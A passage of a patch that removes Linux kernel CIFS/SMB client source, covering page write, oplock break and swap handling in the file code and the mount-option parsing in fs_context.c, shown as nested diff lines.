+-	 * If we write a full page it will be up to date, no need to read from
+-	 * the server. If the write is short, we'll end up doing a sync write
+-	 * instead.
+-	 */
+-	if (len == PAGE_SIZE)
+-		goto out;
+-
+-	/*
+-	 * optimize away the read when we have an oplock, and we're not
+-	 * expecting to use any of the data we'd be reading in. That
+-	 * is, when the page lies beyond the EOF, or straddles the EOF
+-	 * and the write will cover all of the existing data.
+-	 */
+-	if (CIFS_CACHE_READ(CIFS_I(mapping->host))) {
+-		i_size = i_size_read(mapping->host);
+-		if (page_start >= i_size ||
+-		    (offset == 0 && (pos + len) >= i_size)) {
+-			zero_user_segments(page, 0, offset,
+-					   offset + len,
+-					   PAGE_SIZE);
+-			/*
+-			 * PageChecked means that the parts of the page
+-			 * to which we're not writing are considered up
+-			 * to date. Once the data is copied to the
+-			 * page, it can be set uptodate.
+-			 */
+-			SetPageChecked(page);
+-			goto out;
+-		}
+-	}
+-
+-	if ((file->f_flags & O_ACCMODE) != O_WRONLY && !oncethru) {
+-		/*
+-		 * might as well read a page, it is fast enough. If we get
+-		 * an error, we don't need to return it. cifs_write_end will
+-		 * do a sync write instead since PG_uptodate isn't set.
+-		 */
+-		cifs_readpage_worker(file, page, &page_start);
+-		put_page(page);
+-		oncethru = 1;
+-		goto start;
+-	} else {
+-		/* we could try using another file handle if there is one -
+-		   but how would we lock it to prevent close of that handle
+-		   racing with this read? In any case
+-		   this will be written out by write_end so is fine */
+-	}
+-out:
+-	*pagep = page;
+-	return rc;
+-}
+-
+-static bool cifs_release_folio(struct folio *folio, gfp_t gfp)
+-{
+-	if (folio_test_private(folio))
+-		return 0;
+-	if (folio_test_fscache(folio)) {
+-		if (current_is_kswapd() || !(gfp & __GFP_FS))
+-			return false;
+-		folio_wait_fscache(folio);
+-	}
+-	fscache_note_page_release(cifs_inode_cookie(folio->mapping->host));
+-	return true;
+-}
+-
+-static void cifs_invalidate_folio(struct folio *folio, size_t offset,
+-				 size_t length)
+-{
+-	folio_wait_fscache(folio);
+-}
+-
+-static int cifs_launder_folio(struct folio *folio)
+-{
+-	int rc = 0;
+-	loff_t range_start = folio_pos(folio);
+-	loff_t range_end = range_start + folio_size(folio);
+-	struct writeback_control wbc = {
+-		.sync_mode = WB_SYNC_ALL,
+-		.nr_to_write = 0,
+-		.range_start = range_start,
+-		.range_end = range_end,
+-	};
+-
+-	cifs_dbg(FYI, "Launder page: %lu\n", folio->index);
+-
+-	if (folio_clear_dirty_for_io(folio))
+-		rc = cifs_writepage_locked(&folio->page, &wbc);
+-
+-	folio_wait_fscache(folio);
+-	return rc;
+-}
+-
+-void cifs_oplock_break(struct work_struct *work)
+-{
+-	struct cifsFileInfo *cfile = container_of(work, struct cifsFileInfo,
+-						  oplock_break);
+-	struct inode *inode = d_inode(cfile->dentry);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	int rc = 0;
+-	bool purge_cache = false, oplock_break_cancelled;
+-	__u64 persistent_fid, volatile_fid;
+-	__u16 net_fid;
+-
+-	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+-			TASK_UNINTERRUPTIBLE);
+-
+-	server->ops->downgrade_oplock(server, cinode, cfile->oplock_level,
+-				      cfile->oplock_epoch, &purge_cache);
+-
+-	if (!CIFS_CACHE_WRITE(cinode) && CIFS_CACHE_READ(cinode) &&
+-						cifs_has_mand_locks(cinode)) {
+-		cifs_dbg(FYI, "Reset oplock to None for inode=%p due to mand locks\n",
+-			 inode);
+-		cinode->oplock = 0;
+-	}
+-
+-	if (inode && S_ISREG(inode->i_mode)) {
+-		if (CIFS_CACHE_READ(cinode))
+-			break_lease(inode, O_RDONLY);
+-		else
+-			break_lease(inode, O_WRONLY);
+-		rc = filemap_fdatawrite(inode->i_mapping);
+-		if (!CIFS_CACHE_READ(cinode) || purge_cache) {
+-			rc = filemap_fdatawait(inode->i_mapping);
+-			mapping_set_error(inode->i_mapping, rc);
+-			cifs_zap_mapping(inode);
+-		}
+-		cifs_dbg(FYI, "Oplock flush inode %p rc %d\n", inode, rc);
+-		if (CIFS_CACHE_WRITE(cinode))
+-			goto oplock_break_ack;
+-	}
+-
+-	rc = cifs_push_locks(cfile);
+-	if (rc)
+-		cifs_dbg(VFS, "Push locks rc = %d\n", rc);
+-
+-oplock_break_ack:
+-	/*
+-	 * When oplock break is received and there are no active
+-	 * file handles but cached, then schedule deferred close immediately.
+-	 * So, new open will not use cached handle.
+-	 */
+-
+-	if (!CIFS_CACHE_HANDLE(cinode) && !list_empty(&cinode->deferred_closes))
+-		cifs_close_deferred_file(cinode);
+-
+-	persistent_fid = cfile->fid.persistent_fid;
+-	volatile_fid = cfile->fid.volatile_fid;
+-	net_fid = cfile->fid.netfid;
+-	oplock_break_cancelled = cfile->oplock_break_cancelled;
+-
+-	_cifsFileInfo_put(cfile, false /* do not wait for ourself */, false);
+-	/*
+-	 * releasing stale oplock after recent reconnect of smb session using
+-	 * a now incorrect file handle is not a data integrity issue but do
+-	 * not bother sending an oplock release if session to server still is
+-	 * disconnected since oplock already released by the server
+-	 */
+-	if (!oplock_break_cancelled) {
+-		/* check for server null since can race with kill_sb calling tree disconnect */
+-		if (tcon->ses && tcon->ses->server) {
+-			rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
+-				volatile_fid, net_fid, cinode);
+-			cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
+-		} else
+-			pr_warn_once("lease break not sent for unmounted share\n");
+-	}
+-
+-	cifs_done_oplock_break(cinode);
+-}
+-
+-/*
+- * The presence of cifs_direct_io() in the address space ops vector
+- * allowes open() O_DIRECT flags which would have failed otherwise.
+- *
+- * In the non-cached mode (mount with cache=none), we shunt off direct read and write requests
+- * so this method should never be called.
+- *
+- * Direct IO is not yet supported in the cached mode.
+- */
+-static ssize_t
+-cifs_direct_io(struct kiocb *iocb, struct iov_iter *iter)
+-{
+-        /*
+-         * FIXME
+-         * Eventually need to support direct IO for non forcedirectio mounts
+-         */
+-        return -EINVAL;
+-}
+-
+-static int cifs_swap_activate(struct swap_info_struct *sis,
+-			      struct file *swap_file, sector_t *span)
+-{
+-	struct cifsFileInfo *cfile = swap_file->private_data;
+-	struct inode *inode = swap_file->f_mapping->host;
+-	unsigned long blocks;
+-	long long isize;
+-
+-	cifs_dbg(FYI, "swap activate\n");
+-
+-	if (!swap_file->f_mapping->a_ops->swap_rw)
+-		/* Cannot support swap */
+-		return -EINVAL;
+-
+-	spin_lock(&inode->i_lock);
+-	blocks = inode->i_blocks;
+-	isize = inode->i_size;
+-	spin_unlock(&inode->i_lock);
+-	if (blocks*512 < isize) {
+-		pr_warn("swap activate: swapfile has holes\n");
+-		return -EINVAL;
+-	}
+-	*span = sis->pages;
+-
+-	pr_warn_once("Swap support over SMB3 is experimental\n");
+-
+-	/*
+-	 * TODO: consider adding ACL (or documenting how) to prevent other
+-	 * users (on this or other systems) from reading it
+-	 */
+-
+-
+-	/* TODO: add sk_set_memalloc(inet) or similar */
+-
+-	if (cfile)
+-		cfile->swapfile = true;
+-	/*
+-	 * TODO: Since file already open, we can't open with DENY_ALL here
+-	 * but we could add call to grab a byte range lock to prevent others
+-	 * from reading or writing the file
+-	 */
+-
+-	sis->flags |= SWP_FS_OPS;
+-	return add_swap_extent(sis, 0, sis->max, 0);
+-}
+-
+-static void cifs_swap_deactivate(struct file *file)
+-{
+-	struct cifsFileInfo *cfile = file->private_data;
+-
+-	cifs_dbg(FYI, "swap deactivate\n");
+-
+-	/* TODO: undo sk_set_memalloc(inet) will eventually be needed */
+-
+-	if (cfile)
+-		cfile->swapfile = false;
+-
+-	/* do we need to unpin (or unlock) the file */
+-}
+-
+-/*
+- * Mark a page as having been made dirty and thus needing writeback.  We also
+- * need to pin the cache object to write back to.
+- */
+-#ifdef CONFIG_CIFS_FSCACHE
+-static bool cifs_dirty_folio(struct address_space *mapping, struct folio *folio)
+-{
+-	return fscache_dirty_folio(mapping, folio,
+-					cifs_inode_cookie(mapping->host));
+-}
+-#else
+-#define cifs_dirty_folio filemap_dirty_folio
+-#endif
+-
+-const struct address_space_operations cifs_addr_ops = {
+-	.read_folio = cifs_read_folio,
+-	.readahead = cifs_readahead,
+-	.writepage = cifs_writepage,
+-	.writepages = cifs_writepages,
+-	.write_begin = cifs_write_begin,
+-	.write_end = cifs_write_end,
+-	.dirty_folio = cifs_dirty_folio,
+-	.release_folio = cifs_release_folio,
+-	.direct_IO = cifs_direct_io,
+-	.invalidate_folio = cifs_invalidate_folio,
+-	.launder_folio = cifs_launder_folio,
+-	/*
+-	 * TODO: investigate and if useful we could add an cifs_migratePage
+-	 * helper (under an CONFIG_MIGRATION) in the future, and also
+-	 * investigate and add an is_dirty_writeback helper if needed
+-	 */
+-	.swap_activate = cifs_swap_activate,
+-	.swap_deactivate = cifs_swap_deactivate,
+-};
+-
+-/*
+- * cifs_readahead requires the server to support a buffer large enough to
+- * contain the header plus one complete page of data.  Otherwise, we need
+- * to leave cifs_readahead out of the address space operations.
+- */
+-const struct address_space_operations cifs_addr_ops_smallbuf = {
+-	.read_folio = cifs_read_folio,
+-	.writepage = cifs_writepage,
+-	.writepages = cifs_writepages,
+-	.write_begin = cifs_write_begin,
+-	.write_end = cifs_write_end,
+-	.dirty_folio = cifs_dirty_folio,
+-	.release_folio = cifs_release_folio,
+-	.invalidate_folio = cifs_invalidate_folio,
+-	.launder_folio = cifs_launder_folio,
+-};
+diff --git a/fs/cifs/fs_context.c b/fs/cifs/fs_context.c
+deleted file mode 100644
+index e2e2ef0fa9a0f..0000000000000
+--- a/fs/cifs/fs_context.c
++++ /dev/null
+@@ -1,1773 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2020, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- *              David Howells <dhowells@redhat.com>
+- */
+-
+-/*
+-#include <linux/module.h>
+-#include <linux/nsproxy.h>
+-#include <linux/slab.h>
+-#include <linux/magic.h>
+-#include <linux/security.h>
+-#include <net/net_namespace.h>
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-*/
+-
+-#include <linux/ctype.h>
+-#include <linux/fs_context.h>
+-#include <linux/fs_parser.h>
+-#include <linux/fs.h>
+-#include <linux/mount.h>
+-#include <linux/parser.h>
+-#include <linux/utsname.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "ntlmssp.h"
+-#include "nterr.h"
+-#include "rfc1002pdu.h"
+-#include "fs_context.h"
+-
+-static DEFINE_MUTEX(cifs_mount_mutex);
+-
+-static const match_table_t cifs_smb_version_tokens = {
+-	{ Smb_1, SMB1_VERSION_STRING },
+-	{ Smb_20, SMB20_VERSION_STRING},
+-	{ Smb_21, SMB21_VERSION_STRING },
+-	{ Smb_30, SMB30_VERSION_STRING },
+-	{ Smb_302, SMB302_VERSION_STRING },
+-	{ Smb_302, ALT_SMB302_VERSION_STRING },
+-	{ Smb_311, SMB311_VERSION_STRING },
+-	{ Smb_311, ALT_SMB311_VERSION_STRING },
+-	{ Smb_3any, SMB3ANY_VERSION_STRING },
+-	{ Smb_default, SMBDEFAULT_VERSION_STRING },
+-	{ Smb_version_err, NULL }
+-};
+-
+-static const match_table_t cifs_secflavor_tokens = {
+-	{ Opt_sec_krb5, "krb5" },
+-	{ Opt_sec_krb5i, "krb5i" },
+-	{ Opt_sec_krb5p, "krb5p" },
+-	{ Opt_sec_ntlmsspi, "ntlmsspi" },
+-	{ Opt_sec_ntlmssp, "ntlmssp" },
+-	{ Opt_sec_ntlmv2, "nontlm" },
+-	{ Opt_sec_ntlmv2, "ntlmv2" },
+-	{ Opt_sec_ntlmv2i, "ntlmv2i" },
+-	{ Opt_sec_none, "none" },
+-
+-	{ Opt_sec_err, NULL }
+-};
+-
+-const struct fs_parameter_spec smb3_fs_parameters[] = {
+-	/* Mount options that take no arguments */
+-	fsparam_flag_no("user_xattr", Opt_user_xattr),
+-	fsparam_flag_no("forceuid", Opt_forceuid),
+-	fsparam_flag_no("multichannel", Opt_multichannel),
+-	fsparam_flag_no("forcegid", Opt_forcegid),
+-	fsparam_flag("noblocksend", Opt_noblocksend),
+-	fsparam_flag("noautotune", Opt_noautotune),
+-	fsparam_flag("nolease", Opt_nolease),
+-	fsparam_flag_no("hard", Opt_hard),
+-	fsparam_flag_no("soft", Opt_soft),
+-	fsparam_flag_no("perm", Opt_perm),
+-	fsparam_flag("nodelete", Opt_nodelete),
+-	fsparam_flag_no("mapposix", Opt_mapposix),
+-	fsparam_flag("mapchars", Opt_mapchars),
+-	fsparam_flag("nomapchars", Opt_nomapchars),
+-	fsparam_flag_no("sfu", Opt_sfu),
+-	fsparam_flag("nodfs", Opt_nodfs),
+-	fsparam_flag_no("posixpaths", Opt_posixpaths),
+-	fsparam_flag_no("unix", Opt_unix),
+-	fsparam_flag_no("linux", Opt_unix),
+-	fsparam_flag_no("posix", Opt_unix),
+-	fsparam_flag("nocase", Opt_nocase),
+-	fsparam_flag("ignorecase", Opt_nocase),
+-	fsparam_flag_no("brl", Opt_brl),
+-	fsparam_flag_no("handlecache", Opt_handlecache),
+-	fsparam_flag("forcemandatorylock", Opt_forcemandatorylock),
+-	fsparam_flag("forcemand", Opt_forcemandatorylock),
+-	fsparam_flag("setuidfromacl", Opt_setuidfromacl),
+-	fsparam_flag("idsfromsid", Opt_setuidfromacl),
+-	fsparam_flag_no("setuids", Opt_setuids),
+-	fsparam_flag_no("dynperm", Opt_dynperm),
+-	fsparam_flag_no("intr", Opt_intr),
+-	fsparam_flag_no("strictsync", Opt_strictsync),
+-	fsparam_flag_no("serverino", Opt_serverino),
+-	fsparam_flag("rwpidforward", Opt_rwpidforward),
+-	fsparam_flag("cifsacl", Opt_cifsacl),
+-	fsparam_flag_no("acl", Opt_acl),
+-	fsparam_flag("locallease", Opt_locallease),
+-	fsparam_flag("sign", Opt_sign),
+-	fsparam_flag("ignore_signature", Opt_ignore_signature),
+-	fsparam_flag("signloosely", Opt_ignore_signature),
+-	fsparam_flag("seal", Opt_seal),
+-	fsparam_flag("noac", Opt_noac),
+-	fsparam_flag("fsc", Opt_fsc),
+-	fsparam_flag("mfsymlinks", Opt_mfsymlinks),
+-	fsparam_flag("multiuser", Opt_multiuser),
+-	fsparam_flag("sloppy", Opt_sloppy),
+-	fsparam_flag("nosharesock", Opt_nosharesock),
+-	fsparam_flag_no("persistenthandles", Opt_persistent),
+-	fsparam_flag_no("resilienthandles", Opt_resilient),
+-	fsparam_flag_no("tcpnodelay", Opt_tcp_nodelay),
+-	fsparam_flag("nosparse", Opt_nosparse),
+-	fsparam_flag("domainauto", Opt_domainauto),
+-	fsparam_flag("rdma", Opt_rdma),
+-	fsparam_flag("modesid", Opt_modesid),
+-	fsparam_flag("modefromsid", Opt_modesid),
+-	fsparam_flag("rootfs", Opt_rootfs),
+-	fsparam_flag("compress", Opt_compress),
+-	fsparam_flag("witness", Opt_witness),
+-
+-	/* Mount options which take numeric value */
+-	fsparam_u32("backupuid", Opt_backupuid),
+-	fsparam_u32("backupgid", Opt_backupgid),
+-	fsparam_u32("uid", Opt_uid),
+-	fsparam_u32("cruid", Opt_cruid),
+-	fsparam_u32("gid", Opt_gid),
+-	fsparam_u32("file_mode", Opt_file_mode),
+-	fsparam_u32("dirmode", Opt_dirmode),
+-	fsparam_u32("dir_mode", Opt_dirmode),
+-	fsparam_u32("port", Opt_port),
+-	fsparam_u32("min_enc_offload", Opt_min_enc_offload),
+-	fsparam_u32("esize", Opt_min_enc_offload),
+-	fsparam_u32("bsize", Opt_blocksize),
+-	fsparam_u32("rasize", Opt_rasize),
+-	fsparam_u32("rsize", Opt_rsize),
+-	fsparam_u32("wsize", Opt_wsize),
+-	fsparam_u32("actimeo", Opt_actimeo),
+-	fsparam_u32("acdirmax", Opt_acdirmax),
+-	fsparam_u32("acregmax", Opt_acregmax),
+-	fsparam_u32("closetimeo", Opt_closetimeo),
+-	fsparam_u32("echo_interval", Opt_echo_interval),
+-	fsparam_u32("max_credits", Opt_max_credits),
+-	fsparam_u32("handletimeout", Opt_handletimeout),
+-	fsparam_u64("snapshot", Opt_snapshot),
+-	fsparam_u32("max_channels", Opt_max_channels),
+-
+-	/* Mount options which take string value */
+-	fsparam_string("source", Opt_source),
+-	fsparam_string("user", Opt_user),
+-	fsparam_string("username", Opt_user),
+-	fsparam_string("pass", Opt_pass),
+-	fsparam_string("password", Opt_pass),
+-	fsparam_string("ip", Opt_ip),
+-	fsparam_string("addr", Opt_ip),
+-	fsparam_string("domain", Opt_domain),
+-	fsparam_string("dom", Opt_domain),
+-	fsparam_string("srcaddr", Opt_srcaddr),
+-	fsparam_string("iocharset", Opt_iocharset),
+-	fsparam_string("netbiosname", Opt_netbiosname),
+-	fsparam_string("servern", Opt_servern),
+-	fsparam_string("ver", Opt_ver),
+-	fsparam_string("vers", Opt_vers),
+-	fsparam_string("sec", Opt_sec),
+-	fsparam_string("cache", Opt_cache),
+-
+-	/* Arguments that should be ignored */
+-	fsparam_flag("guest", Opt_ignore),
+-	fsparam_flag("noatime", Opt_ignore),
+-	fsparam_flag("relatime", Opt_ignore),
+-	fsparam_flag("_netdev", Opt_ignore),
+-	fsparam_flag_no("suid", Opt_ignore),
+-	fsparam_flag_no("exec", Opt_ignore),
+-	fsparam_flag_no("dev", Opt_ignore),
+-	fsparam_flag_no("mand", Opt_ignore),
+-	fsparam_flag_no("auto", Opt_ignore),
+-	fsparam_string("cred", Opt_ignore),
+-	fsparam_string("credentials", Opt_ignore),
+-	/*
+-	 * UNC and prefixpath is now extracted from Opt_source
+-	 * in the new mount API so we can just ignore them going forward.
+-	 */
+-	fsparam_string("unc", Opt_ignore),
+-	fsparam_string("prefixpath", Opt_ignore),
+-	{}
+-};
+-
+-static int
+-cifs_parse_security_flavors(struct fs_context *fc, char *value, struct smb3_fs_context *ctx)
+-{
+-
+-	substring_t args[MAX_OPT_ARGS];
+-
+-	/*
+-	 * With mount options, the last one should win. Reset any existing
+-	 * settings back to default.
+-	 */
+-	ctx->sectype = Unspecified;
+-	ctx->sign = false;
+-
+-	switch (match_token(value, cifs_secflavor_tokens, args)) {
+-	case Opt_sec_krb5p:
+-		cifs_errorf(fc, "sec=krb5p is not supported!\n");
+-		return 1;
+-	case Opt_sec_krb5i:
+-		ctx->sign = true;
+-		fallthrough;
+-	case Opt_sec_krb5:
+-		ctx->sectype = Kerberos;
+-		break;
+-	case Opt_sec_ntlmsspi:
+-		ctx->sign = true;
+-		fallthrough;
+-	case Opt_sec_ntlmssp:
+-		ctx->sectype = RawNTLMSSP;
+-		break;
+-	case Opt_sec_ntlmv2i:
+-		ctx->sign = true;
+-		fallthrough;
+-	case Opt_sec_ntlmv2:
+-		ctx->sectype = NTLMv2;
+-		break;
+-	case Opt_sec_none:
+-		ctx->nullauth = 1;
+-		break;
+-	default:
+-		cifs_errorf(fc, "bad security option: %s\n", value);
+-		return 1;
+-	}
+-
+-	return 0;
+-}
+-
+-static const match_table_t cifs_cacheflavor_tokens = {
+-	{ Opt_cache_loose, "loose" },
+-	{ Opt_cache_strict, "strict" },
+-	{ Opt_cache_none, "none" },
+-	{ Opt_cache_ro, "ro" },
+-	{ Opt_cache_rw, "singleclient" },
+-	{ Opt_cache_err, NULL }
+-};
+-
+-static int
+-cifs_parse_cache_flavor(struct fs_context *fc, char *value, struct smb3_fs_context *ctx)
+-{
+-	substring_t args[MAX_OPT_ARGS];
+-
+-	switch (match_token(value, cifs_cacheflavor_tokens, args)) {
+-	case Opt_cache_loose:
+-		ctx->direct_io = false;
+-		ctx->strict_io = false;
+-		ctx->cache_ro = false;
+-		ctx->cache_rw = false;
+-		break;
+-	case Opt_cache_strict:
+-		ctx->direct_io = false;
+-		ctx->strict_io = true;
+-		ctx->cache_ro = false;
+-		ctx->cache_rw = false;
+-		break;
+-	case Opt_cache_none:
+-		ctx->direct_io = true;
+-		ctx->strict_io = false;
+-		ctx->cache_ro = false;
+-		ctx->cache_rw = false;
+-		break;
+-	case Opt_cache_ro:
+-		ctx->direct_io = false;
+-		ctx->strict_io = false;
+-		ctx->cache_ro = true;
+-		ctx->cache_rw = false;
+-		break;
+-	case Opt_cache_rw:
+-		ctx->direct_io = false;
+-		ctx->strict_io = false;
+-		ctx->cache_ro = false;
+-		ctx->cache_rw = true;
+-		break;
+-	default:
+-		cifs_errorf(fc, "bad cache= option: %s\n", value);
+-		return 1;
+-	}
+-	return 0;
+-}
+-
+-#define DUP_CTX_STR(field)						\
+-do {									\
+-	if (ctx->field) {						\
+-		new_ctx->field = kstrdup(ctx->field, GFP_ATOMIC);	\
+-		if (new_ctx->field == NULL) {				\
+-			smb3_cleanup_fs_context_contents(new_ctx);	\
+-			return -ENOMEM;					\
+-		}							\
+-	}								\
+-} while (0)
+-
+-int
+-smb3_fs_context_dup(struct smb3_fs_context *new_ctx, struct smb3_fs_context *ctx)
+-{
+-	memcpy(new_ctx, ctx, sizeof(*ctx));
+-	new_ctx->prepath = NULL;
+-	new_ctx->mount_options = NULL;
+-	new_ctx->nodename = NULL;
+-	new_ctx->username = NULL;
+-	new_ctx->password = NULL;
+-	new_ctx->server_hostname = NULL;
+-	new_ctx->domainname = NULL;
+-	new_ctx->UNC = NULL;
+-	new_ctx->source = NULL;
+-	new_ctx->iocharset = NULL;
+-	/*
+-	 * Make sure to stay in sync with smb3_cleanup_fs_context_contents()
+-	 */
+-	DUP_CTX_STR(prepath);
+-	DUP_CTX_STR(mount_options);
+-	DUP_CTX_STR(username);
+-	DUP_CTX_STR(password);
+-	DUP_CTX_STR(server_hostname);
+-	DUP_CTX_STR(UNC);
+-	DUP_CTX_STR(source);
+-	DUP_CTX_STR(domainname);
+-	DUP_CTX_STR(nodename);
+-	DUP_CTX_STR(iocharset);
+-
+-	return 0;
+-}
+-
+-static int
+-cifs_parse_smb_version(struct fs_context *fc, char *value, struct smb3_fs_context *ctx, bool is_smb3)
+-{
+-	substring_t args[MAX_OPT_ARGS];
+-
+-	switch (match_token(value, cifs_smb_version_tokens, args)) {
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	case Smb_1:
+-		if (disable_legacy_dialects) {
+-			cifs_errorf(fc, "mount with legacy dialect disabled\n");
+-			return 1;
+-		}
+-		if (is_smb3) {
+-			cifs_errorf(fc, "vers=1.0 (cifs) not permitted when mounting with smb3\n");
+-			return 1;
+-		}
+-		cifs_errorf(fc, "Use of the less secure dialect vers=1.0 is not recommended unless required for access to very old servers\n");
+-		ctx->ops = &smb1_operations;
+-		ctx->vals = &smb1_values;
+-		break;
+-	case Smb_20:
+-		if (disable_legacy_dialects) {
+-			cifs_errorf(fc, "mount with legacy dialect disabled\n");
+-			return 1;
+-		}
+-		if (is_smb3) {
+-			cifs_errorf(fc, "vers=2.0 not permitted when mounting with smb3\n");
+-			return 1;
+-		}
+-		ctx->ops = &smb20_operations;
+-		ctx->vals = &smb20_values;
+-		break;
+-#else
+-	case Smb_1:
+-		cifs_errorf(fc, "vers=1.0 (cifs) mount not permitted when legacy dialects disabled\n");
+-		return 1;
+-	case Smb_20:
+-		cifs_errorf(fc, "vers=2.0 mount not permitted when legacy dialects disabled\n");
+-		return 1;
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-	case Smb_21:
+-		ctx->ops = &smb21_operations;
+-		ctx->vals = &smb21_values;
+-		break;
+-	case Smb_30:
+-		ctx->ops = &smb30_operations;
+-		ctx->vals = &smb30_values;
+-		break;
+-	case Smb_302:
+-		ctx->ops = &smb30_operations; /* currently identical with 3.0 */
+-		ctx->vals = &smb302_values;
+-		break;
+-	case Smb_311:
+-		ctx->ops = &smb311_operations;
+-		ctx->vals = &smb311_values;
+-		break;
+-	case Smb_3any:
+-		ctx->ops = &smb30_operations; /* currently identical with 3.0 */
+-		ctx->vals = &smb3any_values;
+-		break;
+-	case Smb_default:
+-		ctx->ops = &smb30_operations;
+-		ctx->vals = &smbdefault_values;
+-		break;
+-	default:
+-		cifs_errorf(fc, "Unknown vers= option specified: %s\n", value);
+-		return 1;
+-	}
+-	return 0;
+-}
+-
+-int smb3_parse_opt(const char *options, const char *key, char **val)
+-{
+-	int rc = -ENOENT;
+-	char *opts, *orig, *p;
+-
+-	orig = opts = kstrdup(options, GFP_KERNEL);
+-	if (!opts)
+-		return -ENOMEM;
+-
+-	while ((p = strsep(&opts, ","))) {
+-		char *nval;
+-
+-		if (!*p)
+-			continue;
+-		if (strncasecmp(p, key, strlen(key)))
+-			continue;
+-		nval = strchr(p, '=');
+-		if (nval) {
+-			if (nval == p)
+-				continue;
+-			*nval++ = 0;
+-			*val = kstrdup(nval, GFP_KERNEL);
+-			rc = !*val ? -ENOMEM : 0;
+-			goto out;
+-		}
+-	}
+-out:
+-	kfree(orig);
+-	return rc;
+-}
+-
+-/*
+- * Remove duplicate path delimiters. Windows is supposed to do that
+- * but there are some bugs that prevent rename from working if there are
+- * multiple delimiters.
+- *
+- * Returns a sanitized duplicate of @path. @gfp indicates the GFP_* flags
+- * for kstrdup.
+- * The caller is responsible for freeing the original.
+- */
+-#define IS_DELIM(c) ((c) == '/' || (c) == '\\')
+-char *cifs_sanitize_prepath(char *prepath, gfp_t gfp)
+-{
+-	char *cursor1 = prepath, *cursor2 = prepath;
+-
+-	/* skip all prepended delimiters */
+-	while (IS_DELIM(*cursor1))
+-		cursor1++;
+-
+-	/* copy the first letter */
+-	*cursor2 = *cursor1;
+-
+-	/* copy the remainder... */
+-	while (*(cursor1++)) {
+-		/* ... skipping all duplicated delimiters */
+-		if (IS_DELIM(*cursor1) && IS_DELIM(*cursor2))
+-			continue;
+-		*(++cursor2) = *cursor1;
+-	}
+-
+-	/* if the last character is a delimiter, skip it */
+-	if (IS_DELIM(*(cursor2 - 1)))
+-		cursor2--;
+-
+-	*(cursor2) = '\0';
+-	return kstrdup(prepath, gfp);
+-}
+-
+-/*
+- * Parse a devname into substrings and populate the ctx->UNC and ctx->prepath
+- * fields with the result. Returns 0 on success and an error otherwise
+- * (e.g. ENOMEM or EINVAL)
+- */
+-int
+-smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx)
+-{
+-	char *pos;
+-	const char *delims = "/\\";
+-	size_t len;
+-
+-	if (unlikely(!devname || !*devname)) {
+-		cifs_dbg(VFS, "Device name not specified\n");
+-		return -EINVAL;
+-	}
+-
+-	/* make sure we have a valid UNC double delimiter prefix */
+-	len = strspn(devname, delims);
+-	if (len != 2)
+-		return -EINVAL;
+-
+-	/* find delimiter between host and sharename */
+-	pos = strpbrk(devname + 2, delims);
+-	if (!pos)
+-		return -EINVAL;
+-
+-	/* record the server hostname */
+-	kfree(ctx->server_hostname);
+-	ctx->server_hostname = kstrndup(devname + 2, pos - devname - 2, GFP_KERNEL);
+-	if (!ctx->server_hostname)
+-		return -ENOMEM;
+-
+-	/* skip past delimiter */
+-	++pos;
+-
+-	/* now go until next delimiter or end of string */
+-	len = strcspn(pos, delims);
+-
+-	/* move "pos" up to delimiter or NULL */
+-	pos += len;
+-	kfree(ctx->UNC);
+-	ctx->UNC = kstrndup(devname, pos - devname, GFP_KERNEL);
+-	if (!ctx->UNC)
+-		return -ENOMEM;
+-
+-	convert_delimiter(ctx->UNC, '\\');
+-
+-	/* skip any delimiter */
+-	if (*pos == '/' || *pos == '\\')
+-		pos++;
+-
+-	kfree(ctx->prepath);
+-	ctx->prepath = NULL;
+-
+-	/* If pos is NULL then no prepath */
+-	if (!*pos)
+-		return 0;
+-
+-	ctx->prepath = cifs_sanitize_prepath(pos, GFP_KERNEL);
+-	if (!ctx->prepath)
+-		return -ENOMEM;
+-
+-	return 0;
+-}
+-
+-static void smb3_fs_context_free(struct fs_context *fc);
+-static int smb3_fs_context_parse_param(struct fs_context *fc,
+-				       struct fs_parameter *param);
+-static int smb3_fs_context_parse_monolithic(struct fs_context *fc,
+-					    void *data);
+-static int smb3_get_tree(struct fs_context *fc);
+-static int smb3_reconfigure(struct fs_context *fc);
+-
+-static const struct fs_context_operations smb3_fs_context_ops = {
+-	.free			= smb3_fs_context_free,
+-	.parse_param		= smb3_fs_context_parse_param,
+-	.parse_monolithic	= smb3_fs_context_parse_monolithic,
+-	.get_tree		= smb3_get_tree,
+-	.reconfigure		= smb3_reconfigure,
+-};
+-
+-/*
+- * Parse a monolithic block of data from sys_mount().
+- * smb3_fs_context_parse_monolithic - Parse key[=val][,key[=val]]* mount data
+- * @ctx: The superblock configuration to fill in.
+- * @data: The data to parse
+- *
+- * Parse a blob of data that's in key[=val][,key[=val]]* form.  This can be
+- * called from the ->monolithic_mount_data() fs_context operation.
+- *
+- * Returns 0 on success or the error returned by the ->parse_option() fs_context
+- * operation on failure.
+- */
+-static int smb3_fs_context_parse_monolithic(struct fs_context *fc,
+-					   void *data)
+-{
+-	struct smb3_fs_context *ctx = smb3_fc2context(fc);
+-	char *options = data, *key;
+-	int ret = 0;
+-
+-	if (!options)
+-		return 0;
+-
+-	ctx->mount_options = kstrdup(data, GFP_KERNEL);
+-	if (ctx->mount_options == NULL)
+-		return -ENOMEM;
+-
+-	ret = security_sb_eat_lsm_opts(options, &fc->security);
+-	if (ret)
+-		return ret;
+-
+-	/* BB Need to add support for sep= here TBD */
+-	while ((key = strsep(&options, ",")) != NULL) {
+-		size_t len;
+-		char *value;
+-
+-		if (*key == 0)
+-			break;
+-
+-		/* Check if following character is the deliminator If yes,
